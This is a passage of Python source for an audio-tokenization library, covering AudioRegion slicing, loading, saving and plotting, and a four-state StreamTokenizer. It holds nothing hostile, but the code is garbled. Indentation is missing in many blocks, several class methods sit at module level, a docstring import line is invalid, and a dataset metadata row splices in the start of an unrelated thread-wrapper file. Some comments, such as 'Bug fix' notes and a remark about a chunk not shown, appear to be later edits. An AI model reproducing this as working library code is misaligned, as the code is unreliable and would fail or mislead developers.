size of analysis window, in the same unit as `duration`.
round_fn : callable
function called to round the result. Default: `round`.
epsilon : float
small value to add to the division result before rounding.
E.g., `0.3 / 0.1 = 2.9999999999999996`, when called with
`round_fn=math.floor` returns `2` instead of `3`. Adding a small value
to `0.3 / 0.1` avoids this error.
Returns
-------
nb_windows : int
minimum number of `analysis_window`'s to cover `durartion`. That means
that `analysis_window * nb_windows >= duration`.
"""
if duration < 0 or analysis_window <= 0:
err_msg = "'duration' ({}) must be >= 0 and 'analysis_window' ({}) > 0"
raise ValueError(err_msg.format(duration, analysis_window))
if duration == 0:
return 0
return int(round_fn(duration / analysis_window + epsilon))
def _make_audio_region_meta(
data_frames,
start_frame,
frame_duration,
sampling_rate,
sample_width,
channels,
):
"""
Helper function to create an `AudioRegion` from parameters returned by
tokenization object. It takes care of setting up region `start` and `end`
in metadata.
Parameters
----------
frame_duration: float
duration of analysis window in seconds
start_frame : int
index of the fisrt analysis window
samling_rate : int
sampling rate of audio data
sample_width : int
number of bytes of one audio sample
channels : int
number of channels of audio data
Returns
-------
audio_region : AudioRegion
AudioRegion whose start time is calculeted as:
`1000 * start_frame * frame_duration`
"""
start = start_frame * frame_duration
data = b"".join(data_frames)
duration = len(data) / (sampling_rate * sample_width * channels)
meta = {"start": start, "end": start + duration}
return meta
def _read_chunks_online(max_read, **kwargs):
    """Read audio data from an online blocking source (i.e., microphone).

    Used when building an `AudioRegion` from the microphone. Intercepts
    KeyboardInterrupt so acquisition simply stops when Ctrl+C is pressed,
    which makes interactive ([i]python / notebook) usage friendlier.

    Parameters
    ----------
    max_read : float
        maximum amount of data to read, in seconds.
    kwargs :
        audio parameters (sampling_rate, sample_width and channels).

    Returns
    -------
    tuple
        (data, sampling_rate, sample_width, channels) where `data` is the
        concatenated raw audio bytes.

    See also
    --------
    `AudioRegion.build`
    """
    reader = AudioReader(None, block_dur=0.5, max_read=max_read, **kwargs)
    reader.open()
    chunks = []
    try:
        # `iter` with a None sentinel stops cleanly at end of stream;
        # Ctrl+C just ends acquisition instead of propagating.
        for frame in iter(reader.read, None):
            chunks.append(frame)
    except KeyboardInterrupt:
        pass
    reader.close()
    return (
        b"".join(chunks),
        reader.sampling_rate,
        reader.sample_width,
        reader.channels,
    )
def _read_offline(input, skip=0, max_read=None, **kwargs):
    """Read audio data from an offline source (file path or raw bytes).

    Used when building an `AudioRegion` from anything but the microphone.

    Parameters
    ----------
    input : str, bytes
        path to an audio file (if str), or raw audio data (if bytes).
    skip : float, default 0
        amount of audio, in seconds, to discard from the beginning.
    max_read : float, default: None
        maximum amount of audio to read, in seconds. None (or a negative
        value) means read until end of stream.
    kwargs :
        audio parameters (sampling_rate, sample_width and channels).

    Returns
    -------
    tuple
        (data, sampling_rate, sample_width, channels).

    See also
    --------
    `AudioRegion.build`
    """
    source = get_audio_source(input, **kwargs)
    source.open()
    if skip is not None and skip > 0:
        # Read and discard the skipped prefix.
        source.read(round(skip * source.sampling_rate))
    samples_to_read = None  # None means "until end of stream"
    if max_read is not None and max_read >= 0:
        samples_to_read = round(max_read * source.sampling_rate)
    data = source.read(samples_to_read)
    source.close()
    return (
        data,
        source.sampling_rate,
        source.sample_width,
        source.channels,
    )
def _check_convert_index(index, types, err_msg):
if not isinstance(index, slice) or index.step is not None:
raise TypeError(err_msg)
start = index.start if index.start is not None else 0
stop = index.stop
for index in (start, stop):
if index is not None and not isinstance(index, types):
raise TypeError(err_msg)
return start, stop
class _SecondsView:
    """View that lets an `AudioRegion` be sliced with indices in seconds."""

    def __init__(self, region):
        self._region = region

    def __getitem__(self, index):
        err_msg = (
            "Slicing AudioRegion by seconds requires indices of type "
            "'int' or 'float' without a step (e.g. region.sec[7.5:10])"
        )
        start_s, stop_s = _check_convert_index(index, (int, float), err_msg)
        rate = self._region.sampling_rate
        # Convert second bounds to sample indices; an open end stays None.
        first_sample = int(start_s * rate)
        last_sample = None if stop_s is None else round(stop_s * rate)
        return self._region[first_sample:last_sample]

    @property
    def len(self):
        """Region duration in seconds."""
        return self._region.duration
class _MillisView(_SecondsView):
    """View that lets an `AudioRegion` be sliced with indices in milliseconds."""

    def __getitem__(self, index):
        err_msg = (
            "Slicing AudioRegion by milliseconds requires indices of type "
            "'int' without a step (e.g. region.sec[500:1500])"
        )
        start_ms, stop_ms = _check_convert_index(index, (int), err_msg)
        # Convert to seconds and delegate to the parent view.
        as_seconds = slice(
            start_ms / 1000, None if stop_ms is None else stop_ms / 1000
        )
        return super(_MillisView, self).__getitem__(as_seconds)

    def __len__(self):
        """Region duration in milliseconds (rounded)."""
        return round(self._region.duration * 1000)

    @property
    def len(self):
        """Region duration in milliseconds."""
        return len(self)
class _AudioRegionMetadata(dict):
"""A class to store `AudioRegion`'s metadata."""
def __getattr__(self, name):
if name in self:
return self[name]
else:
err_msg = "AudioRegion metadata has no entry '{}'"
raise AttributeError(err_msg.format(name))
def __setattr__(self, name, value):
self[name] = value
def __str__(self):
return "\n".join("{}: {}".format(k, v) for k, v in self.items())
def __repr__(self):
return str(self)
class AudioRegion(object):
"""
AudioRegion encapsulates raw audio data and provides an interface to
perform simple operations on it. Use `AudioRegion.load` to build an
`AudioRegion` from different types of objects.
Parameters
----------
data : bytes
raw audio data as a bytes object
sampling_rate : int
sampling rate of audio data
sample_width : int
number of bytes of one audio sample
channels : int
number of channels of audio data
meta : dict, default: None
any collection of <key:value> elements used to build metadata for
this `AudioRegion`. Meta data can be accessed via `region.meta.key`
if `key` is a valid python attribute name, or via `region.meta[key]`
if not. Note that the :func:`split` function (or the
:meth:`AudioRegion.split` method) returns `AudioRegions` with a ``start``
and a ``stop`` meta values that indicate the location in seconds of the
region in original audio data.
See also
--------
AudioRegion.load
"""
    def __init__(self, data, sampling_rate, sample_width, channels, meta=None):
        # Sanity-check raw data against sample_width and channels
        # (see io.check_audio_data).
        check_audio_data(data, sample_width, channels)
        self._data = data
        self._sampling_rate = sampling_rate
        self._sample_width = sample_width
        self._channels = channels
        # Cache slot for decoded samples (None until computed — presumably
        # filled by a samples accessor; not visible in this chunk).
        self._samples = None
        # Alias: region.splitp(...) == region.split_and_plot(...)
        self.splitp = self.split_and_plot
        if meta is not None:
            self._meta = _AudioRegionMetadata(meta)
        else:
            self._meta = None
        # Views enabling slicing by seconds/milliseconds, plus short aliases.
        self._seconds_view = _SecondsView(self)
        self.sec = self.seconds
        self.s = self.seconds
        self._millis_view = _MillisView(self)
        self.ms = self.millis
    @property
    def meta(self):
        """Meta data of audio region (an `_AudioRegionMetadata` or None)."""
        return self._meta

    @meta.setter
    def meta(self, new_meta):
        """Meta data of audio region."""
        # Wrap in _AudioRegionMetadata so entries are attribute-accessible.
        self._meta = _AudioRegionMetadata(new_meta)
    @classmethod
    def load(cls, input, skip=0, max_read=None, **kwargs):
        """
        Create an `AudioRegion` by loading data from `input`. See :func:`load`
        for parameters description.

        Returns
        -------
        region: AudioRegion

        Raises
        ------
        ValueError
            raised if `input` is None and `skip` != 0 or `max_read` is None.
        """
        if input is None:
            # Microphone: skipping makes no sense and an explicit read
            # bound is mandatory, otherwise recording would never stop.
            if skip > 0:
                raise ValueError(
                    "'skip' should be 0 when reading from microphone"
                )
            if max_read is None or max_read < 0:
                raise ValueError(
                    "'max_read' should not be None when reading from "
                    "microphone"
                )
            data, sampling_rate, sample_width, channels = _read_chunks_online(
                max_read, **kwargs
            )
        else:
            data, sampling_rate, sample_width, channels = _read_offline(
                input, skip=skip, max_read=max_read, **kwargs
            )
        return cls(data, sampling_rate, sample_width, channels)
    @property
    def seconds(self):
        """
        A view to slice audio region by seconds (using
        ``region.seconds[start:end]``). Aliased as ``sec`` and ``s``.
        """
        return self._seconds_view

    @property
    def millis(self):
        """A view to slice audio region by milliseconds (using
        ``region.millis[start:end]``). Aliased as ``ms``."""
        return self._millis_view
@property
def duration(self):
"""
Returns region duration in seconds.
"""
return len(self._data) / (
self.sampling_rate * self.sample_width * self.channels
)
    @property
    def sampling_rate(self):
        """Sampling rate of audio data."""
        return self._sampling_rate

    @property
    def sr(self):
        """Sampling rate of audio data, alias for `sampling_rate`."""
        return self._sampling_rate

    @property
    def sample_width(self):
        """Number of bytes per sample, one channel considered."""
        return self._sample_width

    @property
    def sw(self):
        """Number of bytes per sample, alias for `sample_width`."""
        return self._sample_width

    @property
    def channels(self):
        """Number of channels of audio data."""
        return self._channels

    @property
    def ch(self):
        """Number of channels of audio data, alias for `channels`."""
        return self._channels
    def play(self, progress_bar=False, player=None, **progress_bar_kwargs):
        """
        Play audio region.

        Parameters
        ----------
        progress_bar : bool, default: False
            whether to use a progress bar while playing audio. Default: False.
            `progress_bar` requires `tqdm`, if not installed, no progress bar
            will be shown.
        player : AudioPlayer, default: None
            audio player to use. if None (default), use `player_for()`
            to get a new audio player.
        progress_bar_kwargs : kwargs
            keyword arguments to pass to `tqdm` progress_bar builder (e.g.,
            use `leave=False` to clean up the screen when play finishes).
        """
        if player is None:
            # Build a player matching this region's audio parameters.
            player = player_for(self)
        player.play(
            self._data, progress_bar=progress_bar, **progress_bar_kwargs
        )
    def save(self, file, audio_format=None, exists_ok=True, **audio_parameters):
        """
        Save audio region to file.

        Parameters
        ----------
        file : str
            path to output audio file. May contain `{duration}` placeholder
            as well as any place holder that this region's metadata might
            contain (e.g., regions returned by `split` contain metadata with
            `start` and `end` attributes that can be used to build output file
            name as `{meta.start}` and `{meta.end}`. See examples using
            placeholders with formatting.
        audio_format : str, default: None
            format used to save audio data. If None (default), format is guessed
            from file name's extension. If file name has no extension, audio
            data is saved as a raw (headerless) audio file.
        exists_ok : bool, default: True
            If True, overwrite `file` if a file with the same name exists.
            If False, raise a `FileExistsError` if `file` exists.
        audio_parameters: dict
            any keyword arguments to be passed to audio saving backend.

        Returns
        -------
        file: str
            name of output file with replaced placeholders.

        Raises
        ------
        FileExistsError
            (a subclass of OSError) if `file` exists and `exists_ok` is False.

        Examples
        --------
        >>> region = AudioRegion(b'\\0' * 2 * 24000,
        >>>                      sampling_rate=16000,
        >>>                      sample_width=2,
        >>>                      channels=1)
        >>> region.meta.start = 2.25
        >>> region.meta.end = 2.25 + region.duration
        >>> region.save('audio_{meta.start}-{meta.end}.wav')
        >>> audio_2.25-3.75.wav
        >>> region.save('region_{meta.start:.3f}_{duration:.3f}.wav')
        audio_2.250_1.500.wav
        """
        if isinstance(file, str):
            # Substitute {duration} and {meta.*} placeholders in the name.
            file = file.format(duration=self.duration, meta=self.meta)
        if not exists_ok and os.path.exists(file):
            raise FileExistsError("file '{file}' exists".format(file=file))
        to_file(
            self._data,
            file,
            audio_format,
            sr=self.sr,
            sw=self.sw,
            ch=self.ch,
            audio_parameters=audio_parameters,
        )
        return file
def split(
    self,
    min_dur=0.2,
    max_dur=5,
    max_silence=0.3,
    drop_trailing_silence=False,
    strict_min_dur=False,
    **kwargs
):
    """Split audio region. See :func:`auditok.split()` for a comprehensive
    description of split parameters.

    See Also :meth:`AudioRegion.split_and_plot`.
    """
    if kwargs.get("max_read", kwargs.get("mr")) is not None:
        # 'max_read' only makes sense when reading from a live source;
        # an AudioRegion is already fully loaded, so callers should slice
        # the region instead.
        # Bug fix: the message previously referred to split_and_plot().
        warn_msg = "'max_read' (or 'mr') should not be used with "
        warn_msg += "AudioRegion.split(). You should rather "
        warn_msg += "slice audio region before calling this method"
        raise RuntimeWarning(warn_msg)
    # Delegate to the module-level auditok split() function.
    return split(
        self,
        min_dur=min_dur,
        max_dur=max_dur,
        max_silence=max_silence,
        drop_trailing_silence=drop_trailing_silence,
        strict_min_dur=strict_min_dur,
        **kwargs
    )
def plot(
    self,
    scale_signal=True,
    show=True,
    figsize=None,
    save_as=None,
    dpi=120,
    theme="auditok",
):
    """Plot this audio region, one sub-plot per channel.

    Parameters
    ----------
    scale_signal : bool, default: True
        if True, subtract the signal's mean and divide by its standard
        deviation before plotting.
    show : bool
        whether to show the plotted signal right after the call.
    figsize : tuple, default: None
        width and height of the figure, passed to `matplotlib`.
    save_as : str, default: None
        if provided, also save the plot to this file.
    dpi : int, default: 120
        plot dpi, passed to `matplotlib`.
    theme : str or dict, default: "auditok"
        plot theme to use. Currently only the "auditok" theme is
        implemented. To provide your own theme see
        :attr:`auditok.plotting.AUDITOK_PLOT_THEME`.
    """
    try:
        from auditok.plotting import plot

        plot_options = {
            "scale_signal": scale_signal,
            "show": show,
            "figsize": figsize,
            "save_as": save_as,
            "dpi": dpi,
            "theme": theme,
        }
        plot(self, **plot_options)
    except ImportError:
        # Plotting support is optional; matplotlib is not a hard dependency.
        raise RuntimeWarning("Plotting requires matplotlib")
def split_and_plot(
    self,
    min_dur=0.2,
    max_dur=5,
    max_silence=0.3,
    drop_trailing_silence=False,
    strict_min_dur=False,
    scale_signal=True,
    show=True,
    figsize=None,
    save_as=None,
    dpi=120,
    theme="auditok",
    **kwargs
):
    """Split this region, then plot the signal with detections overlaid.

    Alias: :meth:`splitp`. See :func:`auditok.split()` for a comprehensive
    description of split parameters, and :meth:`plot` for plot parameters.
    """
    try:
        from auditok.plotting import plot

        detected = list(
            self.split(
                min_dur=min_dur,
                max_dur=max_dur,
                max_silence=max_silence,
                drop_trailing_silence=drop_trailing_silence,
                strict_min_dur=strict_min_dur,
                **kwargs
            )
        )
        # The energy threshold may be passed as 'energy_threshold' or
        # its short alias 'eth'.
        threshold = kwargs.get(
            "energy_threshold", kwargs.get("eth", DEFAULT_ENERGY_THRESHOLD)
        )
        plot(
            self,
            scale_signal=scale_signal,
            detections=[(reg.meta.start, reg.meta.end) for reg in detected],
            energy_threshold=threshold,
            show=show,
            figsize=figsize,
            save_as=save_as,
            dpi=dpi,
            theme=theme,
        )
        return detected
    except ImportError:
        # Plotting support is optional; matplotlib is not a hard dependency.
        raise RuntimeWarning("Plotting requires matplotlib")
def __array__(self):
    # NumPy array protocol: lets np.asarray(region) return the per-channel
    # sample arrays exposed by the `samples` property.
    return self.samples
@property
def samples(self):
    """Audio region as arrays of samples, one array per channel."""
    # Lazily computed on first access and cached in self._samples.
    # signal.to_array deinterleaves the raw bytes into per-channel arrays.
    if self._samples is None:
        self._samples = signal.to_array(
            self._data, self.sample_width, self.channels
        )
    return self._samples
def __len__(self):
    """Return region length in number of (multi-channel) samples."""
    bytes_per_sample = self.sample_width * self.channels
    return len(self._data) // bytes_per_sample
@property
def len(self):
    """
    Return region length in number of samples.
    """
    # Convenience alias for the built-in len(self).
    return len(self)
def __bytes__(self):
    # bytes(region) returns the raw interleaved audio data.
    return self._data
def __str__(self):
    """Human-readable summary of the region's audio parameters."""
    return (
        f"AudioRegion(duration={self.duration:.3f}, "
        f"sampling_rate={self.sr}, sample_width={self.sw}, "
        f"channels={self.ch})"
    )
def __repr__(self):
    # Same representation as __str__ (parameter summary).
    return str(self)
def __add__(self, other):
    """
    Concatenate this region and `other` and return a new region.

    Both regions must have the same sampling rate, sample width
    and number of channels, otherwise a `ValueError` is raised.
    """
    if not isinstance(other, AudioRegion):
        raise TypeError(
            "Can only concatenate AudioRegion, "
            'not "{}"'.format(type(other))
        )
    # All three audio parameters must match; check each in turn.
    parameter_checks = (
        ("sampling rate", self.sr, other.sr),
        ("sample width", self.sw, other.sw),
        ("number of channels", self.ch, other.ch),
    )
    for label, mine, theirs in parameter_checks:
        if mine != theirs:
            raise ValueError(
                "Can only concatenate AudioRegions of the same "
                "{} ({} != {})".format(label, mine, theirs)
            )
    return AudioRegion(
        self._data + other._data, self.sr, self.sw, self.ch
    )
def __radd__(self, other):
    """
    Concatenate `other` and this region and return a new region.

    `other` should be an `AudioRegion` with the same audio parameters
    as this region, but can exceptionally be `0` so that `sum()` (whose
    initial accumulator is 0) can concatenate many regions.
    """
    if other == 0:
        return self
    # Bug fix: AudioRegion defines __add__, not an `add` method, so use
    # the `+` operator to perform the concatenation.
    return other + self
def __mul__(self, n):
    """Return a new region whose data is this region's data repeated `n` times."""
    if not isinstance(n, int):
        err_msg = "Can't multiply AudioRegion by a non-int of type '{}'"
        raise TypeError(err_msg.format(type(n)))
    repeated = self._data * n
    return AudioRegion(repeated, self.sr, self.sw, self.ch)
def __rmul__(self, n):
    # n * region behaves the same as region * n.
    return self * n
def __truediv__(self, n):
    """Split this region into up to `n` sub-regions of (nearly) equal size.

    The first `len(self) % n` sub-regions get one extra sample each.
    Note: if the region has fewer samples than `n`, fewer than `n`
    sub-regions are returned (no empty regions are produced).
    """
    if not isinstance(n, int) or n <= 0:
        raise TypeError("AudioRegion can only be divided by a positive int")
    chunk_size, leftover = divmod(len(self), n)
    chunks = []
    start = 0
    total = len(self)
    while start < total:
        end = start + chunk_size
        if leftover > 0:
            # Distribute the remainder one sample at a time.
            end += 1
            leftover -= 1
        chunks.append(self[start:end])
        start = end
    return chunks
def __eq__(self, other):
    """Two regions are equal iff their raw data and audio parameters match."""
    if other is self:
        return True
    if not isinstance(other, AudioRegion):
        return False
    return (
        self._data == other._data
        and self.sr == other.sr
        and self.sw == other.sw
        and self.ch == other.ch
    )
def __getitem__(self, index):
    """Slice this region by samples and return a new `AudioRegion`.

    Only int slices without a step are supported; negative indices are
    normalized against the region length and clamped at 0.
    """
    err_msg = "Slicing AudioRegion by samples requires indices of type "
    err_msg += "'int' without a step (e.g. region.sec[1600:3200])"
    start_sample, stop_sample = _check_convert_index(index, int, err_msg)
    bytes_per_sample = self.sample_width * self.channels
    len_samples = len(self._data) // bytes_per_sample
    if start_sample < 0:
        start_sample = max(start_sample + len_samples, 0)
    onset = start_sample * bytes_per_sample
    if stop_sample is not None:
        if stop_sample < 0:
            stop_sample = max(stop_sample + len_samples, 0)
        # Bug fix: use the normalized `stop_sample`, not the raw
        # `index.stop`, so negative stop indices are clamped correctly.
        offset = stop_sample * bytes_per_sample
    else:
        offset = None
    data = self._data[onset:offset]
    return AudioRegion(data, self.sr, self.sw, self.ch)
class StreamTokenizer:
"""
Class for stream tokenizers. It implements a 4-state automaton scheme
to extract sub-sequences of interest on the fly.
Parameters
----------
validator : callable, DataValidator (must implement `is_valid`)
called with each data frame read from source. Should take one positional
argument and return True or False for valid and invalid frames
respectively.
min_length : int
Minimum number of frames of a valid token. This includes all
tolerated non valid frames within the token.
max_length : int
Maximum number of frames of a valid token. This includes all
tolerated non valid frames within the token.
max_continuous_silence : int
Maximum number of consecutive non-valid frames within a token.
Note that, within a valid token, there may be many tolerated
*silent* regions that contain each a number of non valid frames up
to `max_continuous_silence`
init_min : int
Minimum number of consecutive valid frames that must be
**initially** gathered before any sequence of non valid frames can
be tolerated. This option is not always needed, it can be used to
drop non-valid tokens as early as possible. **Default = 0** means
that the option is by default ineffective.
init_max_silence : int
Maximum number of tolerated consecutive non-valid frames if the
number already gathered valid frames has not yet reached
'init_min'.This argument is normally used if `init_min` is used.
**Default = 0**, by default this argument is not taken into
consideration.
mode : int
mode can be one of the following:
-1 `StreamTokenizer.NORMAL` : do not drop trailing silence, and
accept a token shorter than `min_length` if it is the continuation
of the latest delivered token.
-2 `StreamTokenizer.STRICT_MIN_LENGTH`: if token `i` is delivered
because `max_length` is reached, and token `i+1` is immediately
adjacent to token `i` (i.e. token `i` ends at frame `k` and token
`i+1` starts at frame `k+1`) then accept token `i+1` only of it has
a size of at least `min_length`. The default behavior is to accept
token `i+1` event if it is shorter than `min_length` (provided that
the above conditions are fulfilled of course).
-3 `StreamTokenizer.DROP_TRAILING_SILENCE`: drop all tailing
non-valid frames from a token to be delivered if and only if it
is not **truncated**. This can be a bit tricky. A token is actually
delivered if:
- `max_continuous_silence` is reached.
- Its length reaches `max_length`. This is referred to as a
**truncated** token.
In the current implementation, a `StreamTokenizer`'s decision is only
based on already seen data and on incoming data. Thus, if a token is
truncated at a non-valid but tolerated frame (`max_length` is reached
but `max_continuous_silence` not yet) any tailing silence will be kept
because it can potentially be part of valid token (if `max_length` was
bigger). But if `max_continuous_silence` is reached before
`max_length`, the delivered token will not be considered as truncated
but a result of *normal* end of detection (i.e. no more valid data).
In that case the trailing silence can be removed if you use the
`StreamTokenizer.DROP_TRAILING_SILENCE` mode.
-4 `(StreamTokenizer.STRICT_MIN_LENGTH | StreamTokenizer.DROP_TRAILING_SILENCE)`:
use both options. That means: first remove tailing silence, then
check if the token still has a length of at least `min_length`.
Examples
--------
In the following code, without `STRICT_MIN_LENGTH`, the 'BB' token is
accepted although it is shorter than `min_length` (3), because it
immediately follows the latest delivered token:
>>> from auditok.core import StreamTokenizer
>>> from StringDataSource, DataValidator
>>> class UpperCaseChecker(DataValidator):
>>> def is_valid(self, frame):
return frame.isupper()
>>> dsource = StringDataSource("aaaAAAABBbbb")
>>> tokenizer = StreamTokenizer(validator=UpperCaseChecker(),
min_length=3,
max_length=4,
max_continuous_silence=0)
>>> tokenizer.tokenize(dsource)
[(['A', 'A', 'A', 'A'], 3, 6), (['B', 'B'], 7, 8)]
The following tokenizer will however reject the 'BB' token:
>>> dsource = StringDataSource("aaaAAAABBbbb")
>>> tokenizer = StreamTokenizer(validator=UpperCaseChecker(),
min_length=3, max_length=4,
max_continuous_silence=0,
mode=StreamTokenizer.STRICT_MIN_LENGTH)
>>> tokenizer.tokenize(dsource)
[(['A', 'A', 'A', 'A'], 3, 6)]
>>> tokenizer = StreamTokenizer(
>>> validator=UpperCaseChecker(),
>>> min_length=3,
>>> max_length=6,
>>> max_continuous_silence=3,
>>> mode=StreamTokenizer.DROP_TRAILING_SILENCE
>>> )
>>> dsource = StringDataSource("aaaAAAaaaBBbbbb")
>>> tokenizer.tokenize(dsource)
[(['A', 'A', 'A', 'a', 'a', 'a'], 3, 8), (['B', 'B'], 9, 10)]
The first token is delivered with its tailing silence because it is
truncated while the second one has its tailing frames removed.
Without `StreamTokenizer.DROP_TRAILING_SILENCE` the output would be:
.. code:: python
[
(['A', 'A', 'A', 'a', 'a', 'a'], 3, 8),
(['B', 'B', 'b', 'b', 'b'], 9, 13)
]
"""
# Automaton states.
SILENCE = 0
POSSIBLE_SILENCE = 1
POSSIBLE_NOISE = 2
NOISE = 3
# Tokenization modes (bit flags; STRICT_MIN_LENGTH and
# DROP_TRAILING_SILENCE may be OR-ed together).
NORMAL = 0
STRICT_MIN_LENGTH = 2
DROP_TRAILING_SILENCE = 4
def __init__(
self,
validator,
min_length,
max_length,
max_continuous_silence,
init_min=0,
init_max_silence=0,
mode=0,
):
if callable(validator):
self._is_valid = validator
elif isinstance(validator, DataValidator):
self._is_valid = validator.is_valid
else:
raise TypeError(
"'validator' must be a callable or an instance of "
"DataValidator"
)
if max_length <= 0:
raise ValueError(
"'max_length' must be > 0 (value={0})".format(max_length)
)
if min_length <= 0 or min_length > max_length:
err_msg = "'min_length' must be > 0 and <= 'max_length' (value={0})"
raise ValueError(err_msg.format(min_length))
if max_continuous_silence >= max_length:
err_msg = "'max_continuous_silence' must be < 'max_length' "
err_msg += "(value={0})"
raise ValueError(err_msg.format(max_continuous_silence))
if init_min >= max_length:
raise ValueError(
"'init_min' must be < 'max_length' (value={0})".format(
max_continuous_silence
)
)
self.validator = validator
self.min_length = min_length
self.max_length = max_length
self.max_continuous_silence = max_continuous_silence
self.init_min = init_min
self.init_max_silent = init_max_silence
self._set_mode(mode)
self._deliver = None
self._tokens = None
self._state = None
self._data = None
self._contiguous_token = False
self._init_count = 0
self._silence_length = 0
self._start_frame = 0
self._current_frame = 0
def _set_mode(self, mode):
strict_min_and_drop_trailing = StreamTokenizer.STRICT_MIN_LENGTH
strict_min_and_drop_trailing |= StreamTokenizer.DROP_TRAILING_SILENCE
if mode not in [
StreamTokenizer.NORMAL,
StreamTokenizer.STRICT_MIN_LENGTH,
StreamTokenizer.DROP_TRAILING_SILENCE,
strict_min_and_drop_trailing,
]:
raise ValueError("Wrong value for mode")
self._mode = mode
self._strict_min_length = (mode & self.STRICT_MIN_LENGTH) != 0
self._drop_trailing_silence = (mode & self.DROP_TRAILING_SILENCE) != 0
def _reinitialize(self):
    """Reset all internal state before a new tokenization run."""
    self._contiguous_token = False
    self._data = []
    self._tokens = []
    self._state = self.SILENCE
    # -1 so that the first read() bumps the counter to frame 0.
    self._current_frame = -1
    self._deliver = self._append_token
def tokenize(self, data_source, callback=None, generator=False):
"""
Read data from `data_source`, one frame a time, and process the read
frames in order to detect sequences of frames that make up valid
tokens.
:Parameters:
`data_source` : instance of the :class:`DataSource` class that
implements a `read` method. 'read' should return a slice of
signal, i.e. frame (of whatever type as long as it can be
processed by validator) and None if there is no more signal.
`callback` : an optional 3-argument function.
If a `callback` function is given, it will be called each time
a valid token is found.
:Returns:
A list of tokens if `callback` is None. Each token is tuple with the
following elements:
.. code python
(data, start, end)
where `data` is a list of read frames, `start`: index of the first
frame in the original data and `end` : index of the last frame.
"""
token_gen = self._iter_tokens(data_source)
if callback:
for token in token_gen:
callback(*token)
return
if generator:
return token_gen
return list(token_gen)
def _iter_tokens(self, data_source):
self._reinitialize()
while True:
frame = data_source.read()
self._current_frame += 1
if frame is None:
token = self._post_process()
if token is not None:
yield token
break
token = self._process(frame)
if token is not None:
yield token
def _process(self, frame):  # noqa: C901
    """Feed one frame to the 4-state automaton.

    Returns a complete token tuple (data, start, end) when this frame
    closes a token, otherwise None. States:
      SILENCE          -> no token in progress
      POSSIBLE_NOISE   -> gathering frames, init_min not yet reached
      NOISE            -> inside a valid token
      POSSIBLE_SILENCE -> inside a token, in a tolerated silent run
    """
    frame_is_valid = self._is_valid(frame)
    if self._state == self.SILENCE:
        if frame_is_valid:
            # seems we got a valid frame after a silence
            self._init_count = 1
            self._silence_length = 0
            self._start_frame = self._current_frame
            self._data.append(frame)
            if self._init_count >= self.init_min:
                self._state = self.NOISE
                if len(self._data) >= self.max_length:
                    return self._process_end_of_detection(True)
            else:
                self._state = self.POSSIBLE_NOISE
    elif self._state == self.POSSIBLE_NOISE:
        if frame_is_valid:
            self._silence_length = 0
            self._init_count += 1
            self._data.append(frame)
            if self._init_count >= self.init_min:
                self._state = self.NOISE
                if len(self._data) >= self.max_length:
                    return self._process_end_of_detection(True)
        else:
            self._silence_length += 1
            if (
                self._silence_length > self.init_max_silent
                or len(self._data) + 1 >= self.max_length
            ):
                # either init_max_silent or max_length is reached
                # before _init_count, back to silence
                self._data = []
                self._state = self.SILENCE
            else:
                self._data.append(frame)
    elif self._state == self.NOISE:
        if frame_is_valid:
            self._data.append(frame)
            if len(self._data) >= self.max_length:
                return self._process_end_of_detection(True)
        elif self.max_continuous_silence <= 0:
            # max token reached at this frame will _deliver if
            # _contiguous_token and not _strict_min_length
            self._state = self.SILENCE
            return self._process_end_of_detection()
        else:
            # this is the first silent frame following a valid one
            # and it is tolerated
            self._silence_length = 1
            self._data.append(frame)
            self._state = self.POSSIBLE_SILENCE
            if len(self._data) == self.max_length:
                return self._process_end_of_detection(True)
            # don't reset _silence_length because we still
            # need to know the total number of silent frames
    elif self._state == self.POSSIBLE_SILENCE:
        if frame_is_valid:
            self._data.append(frame)
            self._silence_length = 0
            self._state = self.NOISE
            if len(self._data) >= self.max_length:
                return self._process_end_of_detection(True)
        else:
            if self._silence_length >= self.max_continuous_silence:
                self._state = self.SILENCE
                if self._silence_length < len(self._data):
                    # _deliver only gathered frames aren't all silent
                    return self._process_end_of_detection()
                self._data = []
                self._silence_length = 0
            else:
                self._data.append(frame)
                self._silence_length += 1
                if len(self._data) >= self.max_length:
                    return self._process_end_of_detection(True)
                # don't reset _silence_length because we still
                # need to know the total number of silent frames
def _post_process(self):
    """Flush a pending token at end of stream, if one is worth delivering."""
    if self._state == self.NOISE or self._state == self.POSSIBLE_SILENCE:
        # Deliver only if the gathered frames are not all trailing silence.
        if len(self._data) > 0 and len(self._data) > self._silence_length:
            return self._process_end_of_detection()
def _process_end_of_detection(self, truncated=False):
    """Finalize the current token; return (data, start, end) if delivered.

    `truncated` is True when the token was cut because it reached
    `max_length`; in that case trailing silence is always kept and the
    next token is marked contiguous with this one.
    """
    if (
        not truncated
        and self._drop_trailing_silence
        and self._silence_length > 0
    ):
        # happens if max_continuous_silence is reached
        # or max_length is reached at a silent frame
        self._data = self._data[0 : -self._silence_length]
    if (len(self._data) >= self.min_length) or (
        len(self._data) > 0
        and not self._strict_min_length
        and self._contiguous_token
    ):
        start_frame = self._start_frame
        end_frame = self._start_frame + len(self._data) - 1
        data = self._data
        self._data = []
        token = (data, start_frame, end_frame)
        if truncated:
            # next token (if any) will start at _current_frame + 1
            self._start_frame = self._current_frame + 1
            # remember that it is contiguous with the just delivered one
            self._contiguous_token = True
        else:
            self._contiguous_token = False
        return token
    else:
        # Token too short and not a tolerated continuation: drop it.
        self._contiguous_token = False
        self._data = []
def _append_token(self, data, start, end):
    # Default delivery strategy: accumulate tokens in self._tokens.
    self._tokens.append((data, start, end))
| 36.259082 | 96 | 0.594609 |
32a79bf89c802d1d51223549312d705d2299f721 | 2,240 | py | Python | pypette/threadwrapper.py | csurfer/pypette | 4e0bfcc56d36d7fb56d381ffcd6e5e58cb9b3ca1 | [
"MIT"
] | 286 | 2017-10-28T10:08:42.000Z | 2022-02-24T06:55:08.000Z | pypette/threadwrapper.py | csurfer/pypette | 4e0bfcc56d36d7fb56d381ffcd6e5e58cb9b3ca1 | [
"MIT"
] | 14 | 2017-10-28T20:29:38.000Z | 2021-09-13T16:14:12.000Z | pypette/threadwrapper.py | csurfer/pypette | 4e0bfcc56d36d7fb56d381ffcd6e5e58cb9b3ca1 | [
"MIT"
] | 13 | 2017-10-29T03:17:19.000Z | 2022-02-21T14:53:06.000Z | # -*- coding: utf-8 -*-
"""
threadwrapper.api
~~~~~~~~~~~~~~~~~
Class definitions to create wrapper threads for jobs.
"""
import subprocess
from enum import Enum
from threading import Thread
from typing import Any, Optional
from .jobs import BashJob, Job
class ThreadState(Enum):
    """State in which a thread can be in."""

    FAILED = 1   # target raised an exception (see ThreadWrapper.run)
